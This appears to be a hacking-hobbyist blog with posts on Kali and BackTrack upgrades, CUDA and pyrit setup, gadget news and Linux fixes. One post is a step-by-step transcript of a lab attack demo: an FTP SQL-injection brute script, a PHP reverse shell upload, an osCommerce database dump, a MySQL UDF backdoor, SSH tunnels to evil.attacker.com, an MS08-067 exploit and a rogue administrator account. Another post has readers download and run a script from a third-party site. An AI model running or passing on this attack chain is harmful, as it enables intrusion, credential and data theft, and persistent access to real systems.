Latest Entries »

Kali Linux 1.0.6 is Released some time ago and am a big fan of Kali Linux. So i wanted to upgrade from version 1.0.5 to 1.0.6 but as i did

apt-get update
apt-get dist-upgrade

The upgrade speed was extremely slow like hell, i have good connection but the reason is the Kali linux HTTP server is overloaded.

So what i did was change the apt-get sources list from below

vi /etc/apt/sources.list

Screenshot from 2014-04-05 20:54:40TO

Screenshot from 2014-04-05 20:53:44Now execute the following commands and you will see significant speed improvement !!! Enjoy :)

apt-get update
apt-get dist-upgrade

cheers :J

 

 

 

 

 

Sorry Every1 for a big delay of 3 months :| i got busy with my exams and so i couldn’t give time to you all but now i have returned to field so lets get started….
Well enjoy this awesome video from Offensive Security :

ftp-brute.py

#!/usr/bin/python
from ftplib import FTP
print "Attempting user Directory Discover via FTP"
for i in range(0,6):

username=%’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT “+ STR(I)+”,1; –  “
password=str(“1″)
ftp=FTP(‘www.offseclabs.com’)
ftp.login(username,password)
print “Logged in as user “+str(i)+”,1″
ftp.retrlines(‘LIST’)
ftp.close()

Commands


Open Terminal A :

nmap -p 21,80 http://www.offseclabs.com
nc -v http://www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear

ftp http://www.offseclabs.com
username – bob
password – bob
(To enumerate the ftp server)

ftp http://www.offseclabs.com
username – %’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; –
password – 1

(logged in to the ftp server)
pwd
ls
bye

clear

cd core
clear
nano brute.py –> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear

ftp http://www.offseclabs.com
username – %’) and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; –
password – 1

(logged in as the fifth user)
ls
put rs.php –> (a reverse php shell)

———————–
Open Terminal B :

nc -lvp 80

———————–
Open Terminal C :

wget http://www.offseclabs.com/rs.php

(Then, at Terminal B, we got a reverse shell)

———————–
Go back to Terminal B :
(inside the reverse shell)

/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)

mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt

————————
Open a Firefox :

http://www.offseclabs.com/images/ccdump.txt
(we got the database dump)

————————-
Go back to Terminal A :

(inside the ftp server)
put up.html –> (file upload html file)
put up.php — > (file upload php file)

————————-
Open Firefox :

http://www.offseclabs.com/up.html

(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)

** Details of lib_mysqludf_sys.so

—————————
Go back to Terminal A :

(quit the ftp server)
bye
clear
exit
(quit Terminal A)

—————————-
Go back to Terminal B :

mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title=”1″ into dumpfile ‘/usr/lib/lib_mysqludf_sys.so’;
SELECT imgdata from binfile where title=”2″ into dumpfile ‘/tmp/db’;

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_get RETURNS string SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_set RETURNS int SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_exec RETURNS int SONAME ‘lib_mysqludf_sys.so’;
CREATE FUNCTION sys_eval RETURNS string SONAME ‘lib_mysqludf_sys.so’;

SELECT sys_eval(‘chmod 755 /tmp/bd’);
SELECT sys_eval(‘/tmp/bd &’);
(don’t press Enter at this moment)

—————————
Open Terminal D :

nc -lvp 80

(go back to Terminal B and press enter, you will get reserver shell at Terminal D)

—————————-
Open Terminal E :

nc -lvp 80

—————————-
Go back to Terminal B :

(inside the MySQL server)
SELECT sys_eval(‘/tmp/bd &’);

(press enter and we got another reverse shell at Terminal E)

—————————
Go back to Terminal E :

(inside the reverse shell)
ping -c 1 10.150.0.20
clear

ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)

—————————–
Open Terminal F :

netstat antp
nmap -sS 127.0.0.1 -p445 –script smb-check-vulns.nse

—————————–
Go back to Terminal D :

ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)

clear

——————————
Go back to Terminal F :

cd core
nano nx.py –> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444

(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add

———————————
Go back to Terminal D :

(quit the tunnel)
exit
clear

ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear

———————————–
Open Terminal G :

netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1

(login to the 10.150.0.20 with username – hacker and password – hacker)

Enjoy :) see ya !!

Cuda on Backtrack 5 R2

After some pyrit problem this is guide to install cuda on Backtrack 5 R2. This guide is to configure cuda drivers and running parallel processing.

Start by preparing your kernel sources for the Nvidia driver installation:

root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/

Download Nvidia drivers according to your CPU architecture

http://www.nvidia.in/Download/indexsg.aspx?lang=en-in

Make sure you are not in an X session (log out to console), and run the Nvidia driver installer.

Next, download the CUDA toolkit, according to your CPU architecture:

developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_32_ubuntu11.04.run  (32 bit)
developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_64_suse11.2.run  (64 bit)

During CUDA toolkit installation give install path folder to /opt.Now Configure your environment variables so that the nvcc command works. You can do this by appending the following lines in your /root/.bashrc file:

PATH=$PATH:/opt/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/cuda/lib
export PATH
export LD_LIBRARY_PATH

Then run:

root@bt:~# source /root/.bashrc
root@bt:~# ldconfig

Now check if everything is setup correctly

root@bt:~# which nvcc
/opt/cuda/bin/nvcc
root@bt:~# nvcc -V
nvcc: NVIDIA (R) Cuda compiler driver
Copyright (c) 2005-2011 NVIDIA Corporation
Built on Thu_Jan_12_14:36:13_PST_2012
Cuda compilation tools, release 4.1, V0.2.1221

Now Nvidia driver and CUDA toolkit is install lets check it by pyrit.

Following command will create main directory tree for installation with svn support.

Code:
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit

We have just created a dir /pyrit_svn.This will install libs and other stuff that are needed:

Code:
apt-get install libssl-dev
apt-get install scapy
apt-get install python-dev

Going to construct pyrit

Code:
cd pyrit/pyrit
python setup.py build
python setup.py install
root@bt:~# cd ../../
root@bt:~# cd pyrit/cpyrit_cuda && python setup.py build && python setup.py install

Run a benchmark to see that everything works as expected:

root@bt:~# pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (63787.8 PMKs/s)... \ 

Computed 63787.82 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce GTX 295: 11558.7 PMKs/s (RTT 3.0)
#2: 'CUDA-Device #2 'GeForce GTX 295: 10912.5 PMKs/s (RTT 2.9)
#3: 'CUDA-Device #3 'GeForce GTX 295: 10632.1 PMKs/s (RTT 3.0)
#4: 'CUDA-Device #4 'GeForce GTX 295: 11654.7 PMKs/s (RTT 2.9)
#5: 'CUDA-Device #5 'GeForce GTX 295: 10868.9 PMKs/s (RTT 2.9)
#6: 'CUDA-Device #6 'GeForce GTX 295: 10322.8 PMKs/s (RTT 3.0)
#7: 'CPU-Core (SSE2)': 500.7 PMKs/s (RTT 2.7)
#8: 'CPU-Core (SSE2)': 508.9 PMKs/s (RTT 2.8)

Tada!! Cuda GPU is enabled.

To remove pyrit remove following directories and files

/usr/local/lib/python2.6/dist-packages/cpyrit/*
/usr/local/lib/python2.6/dist-packages/pyrit*
/usr/local/bin/pyrit

I ran the locate command to find these... ~#locate pyrit

In Case you see some core missing it is due to because one core is reserved.So Dont worry if one core is missing during
Benchmark.
That's all..see ya!!!

The release of the BackTrack 5 R2 kernel has arrived with a brand new 3.2.6 kernel and a tons of new and updated tools and security fixes, BT5 R2 will provide a more stable and complete penetration testing environment than ever before. I will post more on upgrading new tools but for now though, here’s how to get the new kernel and all of the updated package:

1. Update and upgrade your BT5 (R1) installation:

apt-get update
apt-get dist-upgrade
apt-get install beef
reboot

Once that’s done, you should already have the new kernel installed as well as any last updates we have for the official R2 release. You need to reboot to have the 3.2.6 kernel kick in.

During the last upgrade you’ll be asked about file revision updates. Make sure to always keep the locally installed file. Feel free to press “Enter” and accept all the defaults.

Note: if some problem comes of X wont start and showing an error for Nvidia go below process:

Nvidia driver install on BT5r2 Kernel 3.2.6

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/

gedit /etc/modprobe.d/blacklist.conf

>>  blacklist vga16fb

blacklist nouveau

blacklist rivafb

blacklist nvidiafb

blacklist rivatv

then save and close file

Now, remove old nvidia driver

apt-get –purge remove nvidia-*

reboot

echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf

vi /boot/grub/grub.cfg

inserted ‘nouveau.modeset=0′ just before ‘vga=791′ (if two display= 2 insertion)

esc :wq!

update-initramfs-u

reboot

Now,install latest Nvidia from its site for your linux architecture

sh <NVidiafile.run> –kernel-source-path /usr/src/linux-source-3.2.6

or install automatically

add-apt-repository ppa:ubuntu-x-swat/x-updates

apt-get update && apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

reboot

2. OPTIONAL – Once rebooted, log back in, and get your pretty splash screen back.

fix-splash
reboot

On the next reboot, you should see the red console splash screen appear.

3. Verify that you are running a 3.2.6 kernel:

uname -a

You should see something like “Linux bt 3.2.6 …”

4. Feel free to install any or all of the new tools featured in BackTrack 5 R2:

apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef

5. Add the new security updates repository to /etc/apt/sources.list, and run another upgrade.

echo “deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing” >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade

6. Some of the newly installed services will be set to start on boot. We like disabling these as needed:

/etc/init.d/apache2 stop
/etc/init.d/cups stop
/etc/init.d/winbind stopupdate-rc.d -f cups remove
update-rc.d -f apache2 remove
update-rc.d -f winbind remove

And…you’re done!

see ya!!! cheers :)

Running VLC in BT5

Getting VLC running in backtrack 5

Simple instructions to get vlc Running in BT5
run the following in the command line
Code:

apt-get install vlc

once that’s done run
Code:

hexedit /usr/bin/vlc

then press [tab] to move the cursor over to the text section and find where it says:
Code:

geteuid._libc_start_man

and change it to:
Code:

getppid.libc_start_man

thats it! See ya :)

Cool update script in python for adding tools to your BT box..

V.:0.8

  • Rewrote some of the code
  • Added: New Additional Tools menu
  • Added: Install & Register Nessus
  • Moved: BottleFeeding to Additional Tools
  • Moved: Axel & Apt-Fast to Additional Tools
  • Changed: Fix BT5 Bugs to Fix BT5 Bugs/Customize BT5
  • Added: Edit motd in Fix BT5 Bugs/Customize BT5
  • Added: HexorBase to Additional Tools
  • Added: SSLStrip update to Other menu
  • Fixed: Fimap now updates directly from svn

Code:

wget http://bl4ck5w4n.tk/wp-content/uploads/2011/07/bt5up.tar
tar -xvf bt5up.tar
python bt5up.py
thats it! see you all!

Swivl

Taking Self pic or family pics is tough to manage but with Swivl you dont have to worry about anything it is a personal robotic cameraman that’s smart enough to pan and tilt on its own, keeping whoever is holding its electronic marker in the frame.

Perfect for webcam use and self-recording, its electronic marker also has a microphone on board, keeping audio clear no matter where you walk in the room.

Swivl will be available by the end of April for $159.

 

Here is a masterpiece of miniature mechanical and fluid engineering.

Well this watch was not shown at CES 2012, but because it’s so downright weird and cool. It’s the first of its kind. It uses tiny pistons that move a bellows, which then compresses a glowing green liquid that indicates hours, minutes and seconds.

So there you have it, wearing a miniature pump on your wrist, showing you the time that flows through tubes. You start the whole thing in motion by winding it up, just like old-fashioned watches. Astonishing.

This crazy geek stuff is out of range of whooping $45,000.

This year many electric cars are comming out and for this Fulton Innovation showed off its wireless charger at CES 2012, which will working with one part of it buried in the floor of your garage, and the other attached to the underside of an electric car — in this case, a Tesla Roadster.

Any drawback ? Effeciency of such chargers is less than wired charger it will be 89% by the end of year.

for reference : eCoupled for more wireless charging products and dealer info.

The Fisker Karma hybrid electric car is just getting into production, and its makers are taking the car on a U.S. tour to show it off. The car is inspired from cheetah design and have much better solar charging performance than Toyota Prius.The acceleration is of 0-60 mph in 6.3 sec and have a driving range of 50 miles in electric mode and 300 miles in total hybrid mode. The super luxurious interior and sporty exterior of the Fisker Karma is certainly not cheap, with prices starting at $100,000.

In this post, I will explain how to fix waiting for sound system to respond on Linux backtrack 5 Revolution. This problem happen because every time when we login to backtrack as root. Therefore we can not change the sound volume. If you have the same problem, follow the steps bellow:

1. Go to system -> Preferences → Startup Applications.

Make sure  that you click on Tab “Startup programs” and then Click on “Add”.

2. Display a new small window and you will be asked to fill:

Name           : Pulseaudio daemon

Command  : /usr/bin/pulseaudio

Comment   : Start the sound daemon.

3. Restart your Computer or Laptop.

cheers enjoy !!!

Follow

Get every new post delivered to your Inbox.

%d bloggers like this: